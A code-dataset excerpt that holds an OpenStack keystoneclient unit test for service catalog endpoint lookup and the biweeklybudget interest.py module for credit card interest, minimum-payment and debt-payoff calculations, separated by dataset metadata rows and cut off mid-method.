if start + n not in self.local:
self.local[start + n] = i
|
gpl-3.0
| -4,595,868,428,126,769,700
| 30.791667
| 80
| 0.586407
| false
| 3.812277
| false
| false
| false
|
sdpp/python-keystoneclient
|
keystoneclient/tests/unit/v2_0/test_service_catalog.py
|
1
|
9165
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import access
from keystoneclient import exceptions
from keystoneclient import fixture
from keystoneclient.tests.unit.v2_0 import client_fixtures
from keystoneclient.tests.unit.v2_0 import utils
class ServiceCatalogTest(utils.TestCase):
def setUp(self):
super(ServiceCatalogTest, self).setUp()
self.AUTH_RESPONSE_BODY = client_fixtures.auth_response_body()
def test_building_a_service_catalog(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
self.assertEqual(sc.url_for(service_type='compute'),
"https://compute.north.host/v1/1234")
self.assertEqual(sc.url_for('tenantId', '1', service_type='compute'),
"https://compute.north.host/v1/1234")
self.assertEqual(sc.url_for('tenantId', '2', service_type='compute'),
"https://compute.north.host/v1.1/3456")
self.assertRaises(exceptions.EndpointNotFound, sc.url_for, "region",
"South", service_type='compute')
def test_service_catalog_endpoints(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
public_ep = sc.get_endpoints(service_type='compute',
endpoint_type='publicURL')
self.assertEqual(public_ep['compute'][1]['tenantId'], '2')
self.assertEqual(public_ep['compute'][1]['versionId'], '1.1')
self.assertEqual(public_ep['compute'][1]['internalURL'],
"https://compute.north.host/v1.1/3456")
def test_service_catalog_regions(self):
self.AUTH_RESPONSE_BODY['access']['region_name'] = "North"
# Setting region_name on the catalog is deprecated.
with self.deprecations.expect_deprecations_here():
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image', endpoint_type='publicURL')
self.assertEqual(url, "https://image.north.host/v1/")
self.AUTH_RESPONSE_BODY['access']['region_name'] = "South"
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image', endpoint_type='internalURL')
self.assertEqual(url, "https://image-internal.south.host/v1/")
def test_service_catalog_empty(self):
self.AUTH_RESPONSE_BODY['access']['serviceCatalog'] = []
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
self.assertRaises(exceptions.EmptyCatalog,
auth_ref.service_catalog.url_for,
service_type='image',
endpoint_type='internalURL')
def test_service_catalog_get_endpoints_region_names(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
endpoints = sc.get_endpoints(service_type='image', region_name='North')
self.assertEqual(len(endpoints), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.north.host/v1/')
endpoints = sc.get_endpoints(service_type='image', region_name='South')
self.assertEqual(len(endpoints), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.south.host/v1/')
endpoints = sc.get_endpoints(service_type='compute')
self.assertEqual(len(endpoints['compute']), 2)
endpoints = sc.get_endpoints(service_type='compute',
region_name='North')
self.assertEqual(len(endpoints['compute']), 2)
endpoints = sc.get_endpoints(service_type='compute',
region_name='West')
self.assertEqual(len(endpoints['compute']), 0)
def test_service_catalog_url_for_region_names(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image', region_name='North')
self.assertEqual(url, 'https://image.north.host/v1/')
url = sc.url_for(service_type='image', region_name='South')
self.assertEqual(url, 'https://image.south.host/v1/')
url = sc.url_for(service_type='compute',
region_name='North',
attr='versionId',
filter_value='1.1')
self.assertEqual(url, 'https://compute.north.host/v1.1/3456')
self.assertRaises(exceptions.EndpointNotFound, sc.url_for,
service_type='image', region_name='West')
def test_servcie_catalog_get_url_region_names(self):
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
urls = sc.get_urls(service_type='image')
self.assertEqual(len(urls), 2)
urls = sc.get_urls(service_type='image', region_name='North')
self.assertEqual(len(urls), 1)
self.assertEqual(urls[0], 'https://image.north.host/v1/')
urls = sc.get_urls(service_type='image', region_name='South')
self.assertEqual(len(urls), 1)
self.assertEqual(urls[0], 'https://image.south.host/v1/')
urls = sc.get_urls(service_type='image', region_name='West')
self.assertIsNone(urls)
def test_service_catalog_param_overrides_body_region(self):
self.AUTH_RESPONSE_BODY['access']['region_name'] = "North"
# Setting region_name on the catalog is deprecated.
with self.deprecations.expect_deprecations_here():
auth_ref = access.AccessInfo.factory(None, self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_type='image')
self.assertEqual(url, 'https://image.north.host/v1/')
url = sc.url_for(service_type='image', region_name='South')
self.assertEqual(url, 'https://image.south.host/v1/')
endpoints = sc.get_endpoints(service_type='image')
self.assertEqual(len(endpoints['image']), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.north.host/v1/')
endpoints = sc.get_endpoints(service_type='image', region_name='South')
self.assertEqual(len(endpoints['image']), 1)
self.assertEqual(endpoints['image'][0]['publicURL'],
'https://image.south.host/v1/')
def test_service_catalog_service_name(self):
auth_ref = access.AccessInfo.factory(resp=None,
body=self.AUTH_RESPONSE_BODY)
sc = auth_ref.service_catalog
url = sc.url_for(service_name='Image Servers', endpoint_type='public',
service_type='image', region_name='North')
self.assertEqual('https://image.north.host/v1/', url)
self.assertRaises(exceptions.EndpointNotFound, sc.url_for,
service_name='Image Servers', service_type='compute')
urls = sc.get_urls(service_type='image', service_name='Image Servers',
endpoint_type='public')
self.assertIn('https://image.north.host/v1/', urls)
self.assertIn('https://image.south.host/v1/', urls)
urls = sc.get_urls(service_type='image', service_name='Servers',
endpoint_type='public')
self.assertIsNone(urls)
def test_service_catalog_multiple_service_types(self):
token = fixture.V2Token()
token.set_scope()
for i in range(3):
s = token.add_service('compute')
s.add_endpoint(public='public-%d' % i,
admin='admin-%d' % i,
internal='internal-%d' % i,
region='region-%d' % i)
auth_ref = access.AccessInfo.factory(resp=None, body=token)
urls = auth_ref.service_catalog.get_urls(service_type='compute',
endpoint_type='publicURL')
self.assertEqual(set(['public-0', 'public-1', 'public-2']), set(urls))
urls = auth_ref.service_catalog.get_urls(service_type='compute',
endpoint_type='publicURL',
region_name='region-1')
self.assertEqual(('public-1', ), urls)
|
apache-2.0
| -4,503,097,674,112,767,500
| 43.926471
| 79
| 0.602728
| false
| 3.950431
| true
| false
| false
|
jantman/biweeklybudget
|
biweeklybudget/interest.py
|
1
|
37651
|
"""
The latest version of this package is available at:
<http://github.com/jantman/biweeklybudget>
################################################################################
Copyright 2016 Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
This file is part of biweeklybudget, also known as biweeklybudget.
biweeklybudget is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
biweeklybudget is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with biweeklybudget. If not, see <http://www.gnu.org/licenses/>.
The Copyright and Authors attributions contained herein may not be removed or
otherwise altered, except to add the Author attribution of a contributor to
this work. (Additional Terms pursuant to Section 7b of the AGPL v3)
################################################################################
While not legally required, I sincerely request that anyone who finds
bugs please submit them at <https://github.com/jantman/biweeklybudget> or
to me via email, and that you send any contributions or improvements
either as a pull request on GitHub, or to me via email.
################################################################################
AUTHORS:
Jason Antman <jason@jasonantman.com> <http://www.jasonantman.com>
################################################################################
"""
import logging
from datetime import timedelta
from decimal import Decimal
from dateutil.relativedelta import relativedelta
from calendar import monthrange
from biweeklybudget.models.account import Account, AcctType
logger = logging.getLogger(__name__)
class InterestHelper(object):
def __init__(self, db_sess, increases={}, onetimes={}):
"""
Initialize interest calculation helper.
:param db_sess: Database Session
:type db_sess: sqlalchemy.orm.session.Session
:param increases: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for new max payment amount to take effect
on the specified date.
:type increases: dict
:param onetimes: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for additional amounts to add to the first
maximum payment on or after the given date
:type onetimes: dict
"""
self._sess = db_sess
self._accounts = self._get_credit_accounts()
self._statements = self._make_statements(self._accounts)
self._increases = increases
self._onetimes = onetimes
@property
def accounts(self):
"""
Return a dict of `account_id` to :py:class:`~.Account` for all Credit
type accounts with OFX data present.
:return: dict of account_id to Account instance
:rtype: dict
"""
return self._accounts
def _get_credit_accounts(self):
"""
Return a dict of `account_id` to :py:class:`~.Account` for all Credit
type accounts with OFX data present.
:return: dict of account_id to Account instance
:rtype: dict
"""
accts = self._sess.query(Account).filter(
Account.acct_type.__eq__(AcctType.Credit),
Account.is_active.__eq__(True)
).all()
res = {a.id: a for a in accts}
return res
def _make_statements(self, accounts):
"""
Make :py:class:`~.CCStatement` instances for each account; return a
dict of `account_id` to CCStatement instance.
:param accounts: dict of (int) account_id to Account instance
:type accounts: dict
:return: dict of (int) account_id to CCStatement instance
:rtype: dict
"""
res = {}
for a_id, acct in accounts.items():
icls = INTEREST_CALCULATION_NAMES[acct.interest_class_name]['cls'](
acct.effective_apr
)
bill_period = _BillingPeriod(acct.balance.ledger_date.date())
min_pay_cls = MIN_PAYMENT_FORMULA_NAMES[
acct.min_payment_class_name]['cls']()
res[a_id] = CCStatement(
icls,
abs(acct.balance.ledger),
min_pay_cls,
bill_period,
end_balance=abs(acct.balance.ledger),
interest_amt=acct.last_interest_charge
)
logger.debug('Statements: %s', res)
return res
@property
def min_payments(self):
"""
Return a dict of `account_id` to minimum payment for the latest
statement, for each account.
:return: dict of `account_id` to minimum payment (Decimal)
:rtype: dict
"""
res = {}
for a_id, stmt in self._statements.items():
res[a_id] = stmt.minimum_payment
logger.debug('Minimum payments by account_id: %s', res)
return res
def calculate_payoffs(self):
"""
Calculate payoffs for each account/statement.
:return: dict of payoff information. Keys are payoff method names.
Values are dicts, with keys "description" (str description of the
payoff method), "doc" (the docstring of the class), and "results".
The "results" dict has integer `account_id` as the key, and values are
dicts with keys "payoff_months" (int), "total_payments" (Decimal),
"total_interest" (Decimal) and ``next_payment`` (Decimal).
:rtype: dict
"""
res = {}
max_total = sum(list(self.min_payments.values()))
for name in sorted(PAYOFF_METHOD_NAMES.keys()):
cls = PAYOFF_METHOD_NAMES[name]['cls']
klass = cls(
max_total, increases=self._increases, onetimes=self._onetimes
)
if not cls.show_in_ui:
continue
res[name] = {
'description': PAYOFF_METHOD_NAMES[name]['description'],
'doc': PAYOFF_METHOD_NAMES[name]['doc']
}
try:
res[name]['results'] = self._calc_payoff_method(klass)
except Exception as ex:
res[name]['error'] = str(ex)
logger.error('Minimum payment method %s failed: %s',
name, ex)
return res
def _calc_payoff_method(self, cls):
"""
Calculate payoffs using one method.
:param cls: payoff method class
:type cls: biweeklybudget.interest._PayoffMethod
:return: Dict with integer `account_id` as the key, and values are
dicts with keys "payoff_months" (int), "total_payments" (Decimal),
"total_interest" (Decimal), "next_payment" (Decimal).
:rtype: dict
"""
balances = {
x: self._statements[x].principal for x in self._statements.keys()
}
res = {}
calc = calculate_payoffs(cls, list(self._statements.values()))
for idx, result in enumerate(calc):
a_id = list(self._statements.keys())[idx]
res[a_id] = {
'payoff_months': result[0],
'total_payments': result[1],
'total_interest': result[1] - balances[a_id],
'next_payment': result[2]
}
return res
class _InterestCalculation(object):
#: Human-readable string name of the interest calculation type.
description = None
def __init__(self, apr):
"""
:param apr: Annual Percentage Rate as a decimal
:type apr: decimal.Decimal
"""
self._apr = apr
def __repr__(self):
return '<%s(decimal.Decimal(\'%s\'))>' % (
self.__class__.__name__, self.apr
)
@property
def apr(self):
return self._apr
def calculate(self, principal, first_d, last_d, transactions={}):
"""
Calculate compound interest for the specified principal.
:param principal: balance at beginning of statement period
:type principal: decimal.Decimal
:param first_d: date of beginning of statement period
:type first_d: datetime.date
:param last_d: last date of statement period
:type last_d: datetime.date
:param transactions: dict of datetime.date to float amount adjust
the balance by on the specified dates.
:type transactions: dict
:return: dict describing the result: end_balance (float),
interest_paid (float)
:rtype: dict
"""
raise NotImplementedError("Must implement in subclass")
class AdbCompoundedDaily(_InterestCalculation):
"""
Average Daily Balance method, compounded daily (like American Express).
"""
#: Human-readable string name of the interest calculation type.
description = 'Average Daily Balance Compounded Daily (AmEx)'
def calculate(self, principal, first_d, last_d, transactions={}):
"""
Calculate compound interest for the specified principal.
:param principal: balance at beginning of statement period
:type principal: decimal.Decimal
:param first_d: date of beginning of statement period
:type first_d: datetime.date
:param last_d: last date of statement period
:type last_d: datetime.date
:param transactions: dict of datetime.date to float amount adjust
the balance by on the specified dates.
:type transactions: dict
:return: dict describing the result: end_balance (float),
interest_paid (float)
:rtype: dict
"""
dpr = self._apr / Decimal(365.0)
interest = Decimal(0.0)
num_days = 0
bal_total = Decimal(0.0)
bal = principal
d = first_d
while d <= last_d:
num_days += 1
if d in transactions:
bal += transactions[d]
int_amt = bal * dpr
interest += int_amt
bal += int_amt
bal_total += bal
d += timedelta(days=1)
adb = bal_total / Decimal(num_days)
final = adb * self._apr * num_days / Decimal(365.0)
bal += final * dpr
return {
'interest_paid': final,
'end_balance': bal
}
class SimpleInterest(_InterestCalculation):
"""
Simple interest, charged on balance at the end of the billing period.
"""
#: Human-readable string name of the interest calculation type.
description = 'Interest charged once on the balance at end of period.'
def calculate(self, principal, first_d, last_d, transactions={}):
"""
Calculate compound interest for the specified principal.
:param principal: balance at beginning of statement period
:type principal: decimal.Decimal
:param first_d: date of beginning of statement period
:type first_d: datetime.date
:param last_d: last date of statement period
:type last_d: datetime.date
:param transactions: dict of datetime.date to float amount adjust
the balance by on the specified dates.
:type transactions: dict
:return: dict describing the result: end_balance (float),
interest_paid (float)
:rtype: dict
"""
num_days = 0
bal = principal
d = first_d
while d <= last_d:
num_days += 1
if d in transactions:
bal += transactions[d]
d += timedelta(days=1)
final = bal * self._apr * num_days / Decimal(365.0)
return {
'interest_paid': final,
'end_balance': bal + final
}
class _BillingPeriod(object):
#: human-readable string description of the billing period type
description = None
def __init__(self, end_date, start_date=None):
"""
Construct a billing period that is defined by a number of days.
:param end_date: end date of the billing period
:type end_date: datetime.date
:param start_date: start date for billing period; if specified, will
override calculation of start date
:type start_date: datetime.date
"""
self._period_for_date = end_date
if start_date is None:
if end_date.day < 15:
# if end date is < 15, period is month before end_date
self._end_date = (end_date.replace(day=1) - timedelta(days=1))
self._start_date = self._end_date.replace(day=1)
else:
# if end date >= 15, period is month containing end_date
self._start_date = end_date.replace(day=1)
self._end_date = end_date.replace(
day=(monthrange(
end_date.year, end_date.month
)[1])
)
else:
self._start_date = start_date
self._end_date = self._start_date.replace(
day=(monthrange(
self._start_date.year, self._start_date.month
)[1])
)
def __repr__(self):
return '<BillingPeriod(%s, start_date=%s)>' % (
self._end_date, self._start_date
)
@property
def start_date(self):
return self._start_date
@property
def end_date(self):
return self._end_date
@property
def payment_date(self):
period_length = (self._end_date - self._start_date).days
return self._start_date + timedelta(days=int(period_length / 2))
@property
def next_period(self):
"""
Return the next billing period after this one.
:return: next billing period
:rtype: _BillingPeriod
"""
return _BillingPeriod(
self._end_date + relativedelta(months=1),
start_date=(self._end_date + timedelta(days=1))
)
@property
def prev_period(self):
"""
Return the previous billing period before this one.
:return: previous billing period
:rtype: _BillingPeriod
"""
e = self._start_date - timedelta(days=1)
return _BillingPeriod(e, start_date=e.replace(day=1))
class _MinPaymentFormula(object):
#: human-readable string description of the formula
description = None
def __init__(self):
pass
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
raise NotImplementedError()
class MinPaymentAmEx(_MinPaymentFormula):
"""
Interest on last statement plus 1% of balance,
or $35 if balance is less than $35.
"""
#: human-readable string description of the formula
description = 'AmEx - Greatest of Interest Plus 1% of Principal, or $35'
def __init__(self):
super(MinPaymentAmEx, self).__init__()
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
amt = interest + (balance * Decimal('.01'))
if amt < 35:
amt = 35
return amt
class MinPaymentDiscover(_MinPaymentFormula):
"""
Greater of:
- $35; or
- 2% of the New Balance shown on your billing statement; or
- $20, plus any of the following charges as shown on your billing statement:
fees for any debt protection product that you enrolled in on or after
2/1/2015; Interest Charges; and Late Fees.
"""
#: human-readable string description of the formula
description = 'Discover - Greatest of 2% of Principal, or $20 plus ' \
'Interest, or $35'
def __init__(self):
super(MinPaymentDiscover, self).__init__()
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
options = [
Decimal(35),
balance * Decimal('0.02'),
Decimal(20) + interest
]
return max(options)
class MinPaymentCiti(_MinPaymentFormula):
"""
Greater of:
- $25;
- The new balance, if it's less than $25;
- 1 percent of the new balance, plus the current statement's interest
charges or minimum interest charges, plus late fees;
- 1.5% of the new balance, rounded to the nearest dollar amount.
In all cases, add past fees and finance charges due, plus any amount in
excess of credit line.
"""
#: human-readable string description of the formula
description = 'Citi - Greatest of 1.5% of Principal, or 1% of Principal ' \
'plus interest and fees, or $25, or Principal'
def __init__(self):
super(MinPaymentCiti, self).__init__()
def calculate(self, balance, interest):
"""
Calculate the minimum payment for a statement with the given balance
and interest amount.
:param balance: balance amount for the statement
:type balance: decimal.Decimal
:param interest: interest charged for the statement period
:type interest: decimal.Decimal
:return: minimum payment for the statement
:rtype: decimal.Decimal
"""
options = [
25,
(balance * Decimal('0.01')) + interest,
round(balance * Decimal('0.015'))
]
if balance < Decimal('25'):
options.append(balance)
return max(options)
class _PayoffMethod(object):
"""
A payoff method for multiple cards; a method of figuring out how much to
pay on each card, each month.
"""
#: human-readable string name of the payoff method
description = None
def __init__(self, max_total_payment=None, increases={}, onetimes={}):
"""
Initialize a payment method.
:param max_total_payment: maximum total payment for all statements
:type max_total_payment: decimal.Decimal
:param increases: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for new max payment amount to take effect
on the specified date.
:type increases: dict
:param onetimes: dict of :py:class:`datetime.date` to
:py:class:`decimal.Decimal` for additional amounts to add to the first
maximum payment on or after the given date
:type onetimes: dict
"""
self._max_total = max_total_payment
self._increases = increases
self._onetimes = onetimes
def __repr__(self):
return '<%s(%s, increases=%s, onetimes=%s)>' % (
self.__class__.__name__, self._max_total, self._increases,
self._onetimes
)
def max_total_for_period(self, period):
"""
Given a :py:class:`~._BillingPeriod`, calculate the maximum total
payment for that period, including both `self._max_total` and the
increases and onetimes specified on the class constructor.
:param period: billing period to get maximum total payment for
:type period: _BillingPeriod
:return: maximum total payment for the period
:rtype: decimal.Decimal
"""
res = self._max_total
for inc_d in sorted(self._increases.keys(), reverse=True):
if inc_d > period.payment_date:
continue
inc_amt = self._increases[inc_d]
logger.debug('Found increase of %s starting on %s, applied to '
'period %s', inc_amt, inc_d, period)
res = inc_amt
break
for ot_d, ot_amt in self._onetimes.items():
if period.prev_period.payment_date < ot_d <= period.payment_date:
logger.debug('Found onetime of %s on %s in period %s',
ot_amt, ot_d, period)
res += ot_amt
logger.debug('Period %s _max_total=%s max_total_for_period=%s',
period, self._max_total, res)
return res
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
raise NotImplementedError()
class MinPaymentMethod(_PayoffMethod):
"""
Pay only the minimum on each statement.
"""
description = 'Minimum Payment Only'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
return [s.minimum_payment for s in statements]
class FixedPaymentMethod(_PayoffMethod):
"""
TESTING ONLY - pay the same amount on every statement.
"""
description = 'TESTING ONLY - Fixed Payment for All Statements'
show_in_ui = False
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
return [self._max_total for _ in statements]
class HighestBalanceFirstMethod(_PayoffMethod):
"""
Pay statements off from highest to lowest balance.
"""
description = 'Highest to Lowest Balance'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
max_bal = Decimal('0.00')
max_idx = None
for idx, stmt in enumerate(statements):
if stmt.principal > max_bal:
max_bal = stmt.principal
max_idx = idx
res = [None for _ in statements]
max_pay = max_total - (
min_sum - statements[max_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == max_idx:
res[idx] = max_pay
else:
res[idx] = statements[idx].minimum_payment
return res
class HighestInterestRateFirstMethod(_PayoffMethod):
"""
Pay statements off from highest to lowest interest rate.
"""
description = 'Highest to Lowest Interest Rate'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
max_apr = Decimal('0.00')
max_idx = None
for idx, stmt in enumerate(statements):
if stmt.apr > max_apr:
max_apr = stmt.apr
max_idx = idx
res = [None for _ in statements]
max_pay = max_total - (
min_sum - statements[max_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == max_idx:
res[idx] = max_pay
else:
res[idx] = statements[idx].minimum_payment
return res
class LowestBalanceFirstMethod(_PayoffMethod):
"""
Pay statements off from lowest to highest balance, a.k.a. the "snowball"
method.
"""
description = 'Lowest to Highest Balance (a.k.a. Snowball Method)'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
min_bal = Decimal('+Infinity')
min_idx = None
for idx, stmt in enumerate(statements):
if stmt.principal < min_bal:
min_bal = stmt.principal
min_idx = idx
res = [None for _ in statements]
min_pay = max_total - (
min_sum - statements[min_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == min_idx:
res[idx] = min_pay
else:
res[idx] = statements[idx].minimum_payment
return res
class LowestInterestRateFirstMethod(_PayoffMethod):
"""
Pay statements off from lowest to highest interest rate.
"""
description = 'Lowest to Highest Interest Rate'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
min_apr = Decimal('+Infinity')
min_idx = None
for idx, stmt in enumerate(statements):
if stmt.apr < min_apr:
min_apr = stmt.apr
min_idx = idx
res = [None for _ in statements]
min_pay = max_total - (
min_sum - statements[min_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == min_idx:
res[idx] = min_pay
else:
res[idx] = statements[idx].minimum_payment
return res
def calculate_payoffs(payment_method, statements):
"""
Calculate the amount of time (in years) and total amount of money required
to pay off the cards associated with the given list of statements. Return a
list of (`float` number of years, `decimal.Decimal` amount paid,
`decimal.Decimal` first payment amount) tuples for each item in
`statements`.
:param payment_method: method used for calculating payment amount to make
on each statement; subclass of _PayoffMethod
:type payment_method: _PayoffMethod
:param statements: list of :py:class:`~.CCStatement` objects to pay off.
:type statements: list
:return: list of (`float` number of billing periods, `decimal.Decimal`
amount paid, `decimal.Decimal` first payment amount) tuples for each item
in `statements`
:rtype: list
"""
def unpaid(s): return [x for x in s.keys() if s[x]['done'] is False]
payoffs = {}
logger.debug(
'calculating payoff via %s for: %s', payment_method, statements
)
for idx, stmt in enumerate(statements):
payoffs[stmt] = {
'months': 0, 'amt': Decimal('0.0'), 'idx': idx, 'done': False,
'next_pymt_amt': None
}
while len(unpaid(payoffs)) > 0:
u = unpaid(payoffs)
to_pay = payment_method.find_payments(u)
for stmt, p_amt in dict(zip(u, to_pay)).items():
if stmt.principal <= Decimal('0'):
payoffs[stmt]['done'] = True
continue
if stmt.principal <= p_amt:
payoffs[stmt]['done'] = True
payoffs[stmt]['months'] += 1 # increment months
payoffs[stmt]['amt'] += stmt.principal
if payoffs[stmt]['next_pymt_amt'] is None:
payoffs[stmt]['next_pymt_amt'] = stmt.principal
continue
payoffs[stmt]['months'] += 1 # increment months
payoffs[stmt]['amt'] += p_amt
if payoffs[stmt]['next_pymt_amt'] is None:
payoffs[stmt]['next_pymt_amt'] = p_amt
new_s = stmt.pay(Decimal('-1') * p_amt)
payoffs[new_s] = payoffs[stmt]
del payoffs[stmt]
res = []
for s in sorted(payoffs, key=lambda x: payoffs[x]['idx']):
tmp = (
payoffs[s]['months'],
payoffs[s]['amt'],
payoffs[s]['next_pymt_amt']
)
if payoffs[s]['next_pymt_amt'] is None:
tmp = (
payoffs[s]['months'],
payoffs[s]['amt'],
Decimal('0.0')
)
res.append(tmp)
return res
class CCStatement(object):
"""
Represent a credit card statement (one billing period).
"""
def __init__(self, interest_cls, principal, min_payment_cls, billing_period,
transactions={}, end_balance=None, interest_amt=None):
"""
Initialize a CCStatement. At least one of `start_date` and `end_date`
must be specified.
:param interest_cls: Interest calculation method
:type interest_cls: _InterestCalculation
:param principal: starting principal for this billing period
:type principal: decimal.Decimal
:param min_payment_cls: Minimum payment calculation method
:type min_payment_cls: _MinPaymentFormula
:param billing_period: Billing period
:type billing_period: _BillingPeriod
:param transactions: transactions applied during this statement. Dict
of :py:class:`datetime.date` to :py:class:`decimal.Decimal`.
:type transactions: dict
:param end_balance: the ending balance of the statement, if known. If
not specified, this value will be calculated.
:type end_balance: decimal.Decimal
:param interest_amt: The amount of interest charged this statement. If
not specified, this value will be calculated.
:type interest_amt: decimal.Decimal
"""
if not isinstance(billing_period, _BillingPeriod):
raise TypeError(
'billing_period must be an instance of _BillingPeriod'
)
self._billing_period = billing_period
if not isinstance(interest_cls, _InterestCalculation):
raise TypeError(
'interest_cls must be an instance of _InterestCalculation'
)
self._interest_cls = interest_cls
if not isinstance(min_payment_cls, _MinPaymentFormula):
raise TypeError(
'min_payment_cls must be an instance of _MinPaymentFormula'
)
self._min_pay_cls = min_payment_cls
self._orig_principal = principal
self._min_pay = None
self._transactions = transactions
self._principal = end_balance
self._interest_amt = interest_amt
if end_balance is None or interest_amt is None:
res = self._interest_cls.calculate(
principal, self._billing_period.start_date,
self._billing_period.end_date, self._transactions
)
if end_balance is None:
self._principal = res['end_balance']
if interest_amt is None:
self._interest_amt = res['interest_paid']
def __repr__(self):
return '<CCStatement(interest_cls=%s principal=%s min_payment_cls=%s ' \
'transactions=%s end_balance=%s ' \
'interest_amt=%s start_date=%s end_date=%s)>' % (
self._interest_cls, self._principal, self._min_pay_cls,
self._transactions, self._principal,
self._interest_amt, self.start_date, self.end_date
)
@property
def principal(self):
return self._principal
@property
def billing_period(self):
"""
Return the Billing Period for this statement.
:return: billing period for this statement
:rtype: _BillingPeriod
"""
return self._billing_period
@property
def interest(self):
return self._interest_amt
@property
def start_date(self):
return self._billing_period.start_date
@property
def end_date(self):
return self._billing_period.end_date
@property
def apr(self):
return self._interest_cls.apr
@property
def minimum_payment(self):
"""
Return the minimum payment for the next billing cycle.
:return: minimum payment for the next billing cycle
:rtype: decimal.Decimal
"""
return self._min_pay_cls.calculate(
self._principal, self._interest_amt
)
def next_with_transactions(self, transactions={}):
"""
Return a new CCStatement reflecting the next billing period, with a
payment of `amount` applied to it.
:param transactions: dict of transactions, `datetime.date` to `Decimal`
:type transactions: dict
:return: next period statement, with transactions applied
